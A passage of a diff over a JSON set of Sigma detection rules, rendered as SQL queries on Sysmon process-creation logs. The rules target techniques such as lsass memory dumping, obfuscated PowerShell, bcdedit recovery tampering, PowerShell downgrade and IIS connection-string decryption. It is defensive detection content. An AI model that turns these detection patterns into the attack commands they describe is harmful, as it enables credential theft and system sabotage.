Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "status": "test", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_downgrade_attack.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", + "tags": [ + "attack.execution", + "attack.t1059.001" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", - "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", - "author": "Florian Roth (Nextron Systems)", + "title": "VsCode Child Process Anomaly", + "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", - "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "PowerShell Script Run in AppData", + "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "status": "experimental", + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rcedit_execution.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "status": "test", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", - "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "status": "experimental", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unknown" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_query_registry.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina 